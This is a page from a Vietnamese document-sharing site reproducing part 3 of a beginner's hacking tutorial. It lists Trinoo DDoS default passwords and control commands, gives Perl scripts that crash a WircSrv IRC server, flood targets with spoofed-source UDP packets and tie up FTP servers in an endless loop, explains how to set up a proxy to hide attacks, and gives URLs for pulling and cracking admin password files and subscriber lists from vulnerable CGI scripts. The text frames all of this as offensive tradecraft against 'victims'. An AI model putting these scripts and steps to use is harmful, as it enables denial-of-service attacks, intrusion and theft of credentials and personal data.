1. Trang chủ
  2. » Công Nghệ Thông Tin

Những hiểu biết cơ bản nhất để trở thành Hacker phần 3

19 28 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 19
Dung lượng 133,05 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Những hiểu biết cơ bản nhất để trở thành Hacker phần 3 41 . ) Tấn công DDoS thông qua Trinoo : _ Bạn đã biết DDoS attack là gì rồi phải không ? Một cuộc tấn công DDoS bằng Trinoo được thực hiện bởi một kết nối của Hacker Trinoo Master và chỉ dẫn cho Master để phát động một cuộc tấn công DDoS đến một hay nhiều mục tiêu.

Trang 1

Những hiểu biết cơ bản nhất để trở thành Hacker phần 3

trang này đã được đọc lần

41 ) Tấn công DDoS thông qua Trinoo :

_ Bạn đã biết DDoS attack là gì rồi phải không ? Một cuộc tấn công DDoS bằng Trinoo được thực hiện bởi một kết nối của Hacker Trinoo Master và chỉ dẫn cho Master để phát động một cuộc tấn công DDoS đến một hay nhiều mục tiêu Trinoo Master sẽ liên lạc với những Deadmons đưa những địa chỉ được dẫn đến để tấn công một hay nhiều mục tiêu trong khoảng thời gian xác định _ Cả Master và Deamon đều được bảo vệ bằng Passwd chỉ khi chúng ta biết passwd thì mới có thể điều khiển được chúng , điều này không có gì khó

khăn nếu chúng ta là chủ nhân thực sự của chúng Những passwd này thường được mã hoá và bạn có thể thiết lập khi biên dịch Trinoo từ Source ->

Binnary Khi được chạy , Deadmons sẽ hiện ra một dấu nhắc và chờ passwd nhập

vào , nếu passwd nhập sai nó sẽ tự động thoát còn nếu passwd được nhập đúng thì nó sẽ tự động chạy trên nền của hệ thống

attacker$ telnet 10.0.0.1 27665

Trying 10.0.0.1

Connected to 10.0.0.1

Escape character is '^]'

kwijibo

Connection closed by foreign host < == Bạn đã nhập sai

attacker$ telnet 10.0.0.1 27665

Trying 10.0.0.1

Connected to 10.0.0.1

Escape character is '^]'

betaalmostdone

trinoo v1.07d2+f3+c [rpm8d/cb4Sx/]

trinoo> < == bạn đã vào được hệ thống trinoo

_ Đây là vài passwd mặc định :

“l44adsl": pass của trinoo daemon

"gorave": passwd của trinoo master server khi startup

"betaalmostdone": passwd điều khiển từ xa chung cho trinoo master

"killme": passwd trinoo master điều khiển lệnh "mdie"

_ Đây là một số lệnh dùng để điều khiển Master Server:

Trang 2

CODE

die -Shutdown

quit -Log off

mtimer N -Đặt thờI gian để tấn công DoS , vớI N nhận giá trị từ 1 > 1999 giây

dos IP -Tấn công đến một địa chỉ

IP xác định

mdie pass -Vô hiệu hoá tất cả các

Broadcast , nếu như passwd chính xác Một lệnh đưọc gửi tới ("d1e l44adsl") Broadcast để Shutdown chúng Một passwd riêng biệt sẽ được đặt cho mục này

mping -Gửi một lệnh ping tới ("png l44adsl") c¸c Broadcast

mdos <ip1:ip2 > -Send nhiều lênh DOS ("xyz l44adsl

123:ip1:ip2") đến các Broadcast

info -Hiển thị thông tin về

Trinoo

msize -Đặt kích thước đệm cho những gói tin được send đi trong suốt thờI gian DoS

nslookup host -Xác định tên thiết bị của Host mà Master Trinoo đang chạy

usebackup -Chuyển tớI các file

Broadcast sao

lưu được tạo bởi lệnh “killdead”

bcast -Liệt kê danh sách tất cả các Broadcast có thể khai thác

help [cmd] -Đưa ra danh sách các lệnh

mstop -Ngừng lại các cuốc tấn công DOS

_ Đây là một số lệnh dùng để điều khiển Trinoo Deadmons:

CODE

aaa pass IP -Tấn công đến địa chỉ IP

đã xác định GửI gói tin UDP (0-65534) đến cổng của UDP của địa chỉ IP đã xác định trong một khoảng thời gian xác định được mặc định là 120s hay từ 1 >1999 s

bbb pass N -Đặt thờI gian giới hạn cho các cuộc tấn công DOS

Trang 3

Shi pass -Gửi chuỗi “*HELLO*” tới dánh sách Master Server đã được biên dịch trong chương trình trên cổng

31335/UDP

png pass -Send chuỗi “Pong” tớI Master

Server phát hành các lệnh điều khiển trên cổng 31335/UDP

die pass -Shutdown Trinoo

rsz N -Là kích thước của bộ đệm được dùng để tấn công , nó được tính bằng byte

xyz pass 123:ip1:ip3 -tấn công DOS nhiều mục tiêu

cùng lúc

42 ) Kỹ thuật ấn công DoS vào WircSrv Irc Server v5.07 :

_ WircSrv IRC là một Server IRC thông dụng trên Internet ,nó sẽ bị Crash nếu như

bị các Hacker gửi một Packet lớn hơn giá trị ( 65000 ký tự ) cho phép đến Port

6667

Bạn có thể thực hiện việc này bằng cách Telnet đến WircSrv trên Port 6667: Nếu bạn dùng Unix:

[hellme@die-communitech.net$ telnet irc.example.com 6667

Trying example.com

Connected to example.com

Escape character is '^]'

[buffer]

Windows cũng tương tự:

telnet irc.example.com 6667

Lưu ý: [buffer] là Packet dữ liệu tương đương với 65000 ký tự

Tuy nhiên , chúng ta sẽ crash nó rất đơn giản bằng đoạn mã sau ( Các bạn hãy nhìn vào đoạn mã và tự mình giải mã những câu lệnh trong đó , đó cũng là một trong những cách tập luyện cho sự phản xạ của các hacker khi họ nghiên cứu Nào , chúng ta hãy phân tích nó một cách căn bản ):

CODE

#!/usr/bin/perl #< == Đoạn mã này cho ta biết là dùng cho các lệnh trong perl use Getopt::Std;

use Socket;

getopts('s:', \%args);

Trang 4

if(!defined($args{s})){&usage;}

my($serv,$port,$foo,$number,$data,$buf,$in_addr,$paddr,$proto);

$foo = "A"; # Đây là NOP

$number = "65000"; # Đây là tất cả số NOP

$data = $foo x $number; # kết quả của $foo times $number

$serv = $args{s}; # lệnh điều khiển server từ xa

$port = 6667; # lệnh điều khiển cổng từ xa , nó được mặc định là 6667

$buf = "$data";

$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");

$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");

$proto = getprotobyname('tcp') || die("Error: $!\n");

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");

connect(S, $paddr) ||die ("Error: $!");

select(S); $| = 1; select(STDOUT);

print S "$buf";

print S "$buf";

print("Data has been successfully sent to $serv\n");

sub usage {die("\n\n Lỗi WircSrv Version 5.07s

có thể tấn công bằng DoS \n gửi 2 64k gói tin đến server làm cho nó crash.\n -s server_ip\n\n");}

Để sử dụng cái mã này , bạn hãy save nó vào một file *.pl , rồI down chương trình activeperl về sài , setup nó rồi vào HĐH DOS bạn chỉ cần gọi file này ra theo lệnh sau :

C:\>perl < đường dẫn đến file *.pl >

( Đến bây giờ tôi sẽ không bày thật cặn kẽ nữa mà sẽ tăng dần độ khó

lên , nếu bạn nào nghiên cứu kỹ các bài trước thì các bạn sẽ làm được

dễ dàng thôi )

43 ) Kỹ thuật tấn công DoS vào máy tính sử dụng HĐH Win2000 :

_ Muốn sử dụng được nó , bạn phải có activeperl , rồi sử dụng như hướng dẫn tương tự trên Save đoạn mã vào file *.pl rồI dùng lệnh perl gọi nó ra :

CODE

#!/usr/bin/perl -w

use Socket;

use Net::RawIP;

use Getopt::Std;

Trang 5

getopts("s:d:p:l:n:v:t:f:T:rL",%o);$ver="0.3a";$0=~s#.*/##;

print" - $0 v.$ver b/ Nelson Brito / Independent Security Consultant - ";

$l=$o{'l'}?$o{'l'}+28:800+28;$n=$o{'n'}?$o{'n'}/2:800/2;

$v=$o{'v'}||4;$t=$o{'t'}||1;$f=$o{'f'}||0;$T=$o{'T'}||64;

$p=$o{'p'}?$o{'p'}:(getservbyname('isakmp','udp')||die"getservbyname: $! ");

($o{'s'}&&$o{'d'})||die

" Use: $0 [IP Options] [UDP Options] ",

"IP Options: ",

" -s* Đia chi nguon đe bat chuoc ",

" -d* Đia chi bi tan cong ",

" -v IP Version (def: $v) ",

" -t IP Type of Service (TOS) (def: $t) ",

" -f IP fragementation offset (def: $f) ",

" -T IP Time to Live (TTL) (def: $T) ",

"UDP Options: ",

" -p cong cua may tinh nan nhan (def: $p) ",

" -l chieu dai cua goi tin (def: $l) ",

" -r cai đat du lieu ngau nhien (def: ".") ",

"Generic: ",

" -n So luong goi tin ta muon gui đi (def: $n) ",

" -L gui goi tin lien tuc khong ngung cho đen khi may tinh cua nan nhan bi die he he",

" Bai huong dan cua ANHDENDAY ";

while($n > 0){

$|=1;print".";$sp=int rand 65535;

$D=$o{'r'}?(chr(int rand 255)) x $l:"." x $l;

$nb=new Net::RawIP({

ip=>

{

version=>$v,

tos=>$t,

ttl=>$T,

frag_off=>$f,

saddr=>$o{'s'},

daddr=>$o{'d'}

},

udp=>

{

source=>$sp,

dest=>$p,

len=>$l,

data=>$D

Trang 6

}

});

$nb->send;undef $nb;!$o{'L'}&&$n ;

}

print"Finish! ";

_ Khi gọi ra bạn hãy chọn tuỳ chọn đã ghi ở trong đó mà DoS Nhớ là chỉ dùng cho Win2000 nhé

44 ) Kỹ thuật tấn công DoS dễ dàng nhất :

_ Tôi thì mỗi lần muốn tấn công bằng DoS đều dùng chương trình này , nó chẳng kén gì cả và dễ thực hiện Bây giờ tôi sẽ chia sẻ với các bạn

_ Bạn cần phải có Activeperl ( lại là activepert ) đã cài sẵn , save đoạn mã sau vào file abc.pl :

CODE

#!/usr/bin/perl

use IO::Socket;

sub initiate {

if ($ARGV[0] eq '') {die "Usage: perl abc.pl <host> <port> <username>

<password>\nVi du : perl

abc.pl 127.0.0.1 21 anonymous me@\n";}

$host = $ARGV[0];

$port = $ARGV[1];

$user = $ARGV[2];

$pass = $ARGV[3];

};

sub connecttoserver {

print("Connect den host: $host\n");

$socket = IO::Socket::INET->new (PeerAddr => $host,

PeerPort => $port,

Proto => "tcp",

Type => SOCK_STREAM

) || die "khong the connect den $host";

print "Connect thanh cong Loggin vao \n";

};

Trang 7

sub login {

print "user $user\n";

print $socket "user $user\r\n";

$response = <$socket>

print "$response\n";

print "pass $pass\n";

print $socket "pass $pass\r\n";

$response = <$socket>

print "$response\n";

print "Logged in Dang tan cong DoS doi phuong Nhan CTRL-C de ngung.\n"; };

sub doit {

for (;; ){

print "retr a:/x\n";

print $socket "retr a:/x\r\n";

$response = <$socket>

print "$response";

}

}

initiate();

connecttoserver();

login();

doit();

_Nếu bạn từng qua lập trình khi đọc đoạn mã bạn sẽ thấy rằng đoạn mã

này dùng chính thông tin từ ổ đĩa A của nạn nhân để tấn công nạn nhân Nó

sử dụng vòng lặp không có giới hạn từ hàm $socket "retr a:/x\r\n" Khi muốn kết thúc bạn chỉ cần nhấn ctrl+C

_Cuối cùng là bạn chỉ cần gọi nó ra thông qua lệnh perl như các bài trên VD :

perl abc.pl http://www.xxx.com/ anonymous me

trong đó User name và Password có thể là bất kỳ

Vậy là coi như các bạn đã biết tấn công DoS là như thế nào rồi phải không ?

Đó chỉ là những cách tấn công DoS thông thường ( nhưng hậu quả thì chẳng thường thường chút nào ) , còn các kỹ thuật DoS lợi hại khác như DRDoS thì cho các bạn nghiên cứu thêm vậy Nó rất nguy hiểm khi sử dụng lung tung nên để

Trang 8

dành phần đó cho các bạn nào thích và thật sự muốn nghiên cứu về nó Tôi xin dừng phần DoS tại đây

45 ) Tự tạo cho mình một proxy để sài :

_Trong các công việc như tấn công DoS hay đột nhập vào trang Web có trang bị firewall thì bạn cần đến proxy để sài Do đó các bạn hãy tự tạo cho mình

một cái proxy made in <yourname> sài cho nó oai Bây giờ hãy làm cùng tôi _ Trước hết bạn đăng ký một host miễn phí ở trang free.prohosting.com Bạn hãy

khai báo thông tin về bạn trong các ô nhập thông tin Cuối cùng khi đăng ký xong

bạn sẽ nhận được Mail từ trang Web này gửi đến , hãy test nó để lấy pass

mặc định mà nó cho bạn

_ Tiếp theo bạn vào trang www.xav.com , rồi nhấp vào link install phía dưới dòng

chữ Test - script Package( tui nhớ là có 2 cái tên mang chữ script này ) Sau đó bạn nhấn "next" và nhìn ở phía dưới của trang này có chữ show all verdon , bạn hãy nhấn vào đó

_ Tiếp tục bạn nhấn James Marshall ==>CGIscript

==>CGIproxy==>Next==>accept==> cho đến

khi bạn thấy một cái bảng có nhiều ô nhập thông tin Bạn hãy nhập thông tin vào các trang đó :

+ your Website : nhập địa chỉ trang Web của bạn đã đăng ký trong

prohosting.com

+ FTP username : Bạn nhập username mà bạn đã đăng ký trong prohosting.com

+ FTP password : Bạn nhập passwd mà prohosting.com đã send về mail cho bạn

+ Mấy cái còn lại không cần thiết , bạn nhấp next để tiếp tục Rồi nhấn

finish

+ Cuối cùng nó sẽ cho bạn địa chỉ bạn vừa tạo cái proxy đó , bạn hãy ghi

nhớ nó Sau này mỗi lần “hành động” thì bạn lại đem ra sài

46 ) Kỹ thuật lấy pass thông qua lỗi của một số Script :

a ) Calendar CGI Script :

_ Một trong số những scripts đã tìm thấy điểm yếu đó là calendar scripts , nó nằm trong thư mục cgi-bin/calendar, file config là file calendar.cfg chứa

administrator

username và password để thay đổi chọn lựa cho scripts khi cần , cái này có thể tìm thấy ở cuối file calendar.cfg , tuy nhiên chúng đã được mã hoá chúng ta chỉ

Trang 9

việc dùng John The Ripper hay những công cụ khác để giải mã nó là xong : _file calendar.cfg thường đặt tại địa chỉ sau :

http://www.xxx.com/cgi-bin/calendar/calendar.cfg

sau khi crack xong chúng ta sẽ đến Admin Control Login vào địa chỉ :

http://www.xxx.com/cgi-bin/calen _admin.pl?admin

_ Vậy là bạn đã có được quyền admin rồi đó

b ) WebBBS Script :

_WebAdverts Script là một scripts cho phép webmasters hiển thị những biểu ngữ luân

phiên ( quảng cáo chẳng hạn ) hay thêm vào trong trang Web , cuối cùng bạn có thể

sử dụng kết hợp password và username để cài đặt banners tạo một banner accounts

mới , xoá accounts view sensitive info, vv.vv

_Địa chỉ passwd của WebAdverts là :

http://www.xxx.com/cgi-bin/advert/adpassword.txt

sau khi giải mã bạn logging vào:

http://www.xxx.com/cgi-bin/advert/ads_admin.pl

để login như là script administrator

c ) WWWBoard Script :

_WWWBoard có file password có thể tìm thấy trong pasword.txt , chúng ta hãy search nó

bằng từ khoá cgi-bin/wwwebboard hoặc webboard/password.txt

d ) Mailmachine Script :

_Mailmachine.cgi là một webbased mailinglist , bạn có thể trông thấy file

adressed.txt

chứa tất cả danh sách khách đã đăng ký , những danh sách có thể thấy tại

những urls sau:

http://www.xxx.com/cgi-bin/mailman/addresses.txt

Trang 10

http://www.xxx.com/cgi-bin/maillist/addresses.txt

http://www.xxx.com/cgi-bin/mail/addresses.txt

bạn cũng nên tìm addresses.txt mà đôi khi chúng được đổi thành các tên khác Chúng có thể chứa các thông tin quan trọng cho phép bạn khai thác

Việc tìm ra các trang bị lỗi này hẳn các bạn đã biết , tôi sẽ không nhắc

lại nữa ( Nếu ai chưa biết thì vui lòng đọc lạI những phần trước )

=================================================

=====

Nhân đây tôi xin đính chính lại là trong các đoạn code mà tôi phân tích và post lên ở những phần trước tôi đã sơ ý không thêm ký hiệu “#” vào trước

những câu phân tích đó , dẫn đến việc một số bạn thắc mắc là đoạn code

không hoạt động Tôi thành thật xin lỗi các bạn vì sơ ý của tôi , các bạn

chỉ cần lấy đoạn code đó ra và thêm vào dấu “ # ” ở phía trước dòng chú

thích Tiếng Việt của tôi là được ( Thông thường tôi có sử dụng dấu “ <

== ” để giải thích ở phiá đuôi đoạn code đó Các bạn hãy để ý mà fix

nhé

47 ) Các công cụ cần thiết để hack Web :

_ Đối với các hacker chuyên nghiệp thì họ sẽ không cần sử dụng những công

cụ này mà họ sẽ trực tiếp setup phiên bản mà trang Web nạn nhân sử dụng trên máy của mình để test lỗi Nhưng đối với các bạn mới “vào nghề”

thì những công cụ này rất cần thiết , hãy sử dụng chúng một vài lần bạn

sẽ biết cách phối hợp chúng để việc tìm ra lỗi trên các trang Web nạn nhân được nhanh chóng nhất Sau đây là một số công cụ bạn cần phải có trên

máy “làm ăn” của mình :

_ Công cụ thứ 1 : Một cái proxy dùng để che dấu IP và vượt tường lửa khi cần ( Cách tạo 1 cái Proxy tôi đã bày ở phần 7 , các bạn hãy xem lại nhé )

_ Công cụ thứ 2 : Bạn cần có 1 shell account, cái này thực sự quan trọng đối với bạn Một shell account tốt là 1 shell account cho phép bạn chạy các chương trình chính như nslookup, host, dig, ping, traceroute, telnet, ssh, ftp, và shell account

đó cần phải cài chương trình GCC ( rất quan trọng trong việc dịch (compile) các exploit được viết bằng C) như MinGW, Cygwin và các dev tools khác

Shell account gần giống với DOS shell,nhưng nó có nhiều câu lệnh và chức năng hơn DOS Thông thường khi bạn cài Unix thì bạn sẽ có 1 shell account, nếu bạn không cài Unix thì bạn nên đăng ký trên mạng 1 shell account free hoặc nếu có

ai

đó cài Unix và thiết lập cho bạn 1 shell account thì bạn có thể log vào telnet

Ngày đăng: 11/05/2021, 02:06

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

w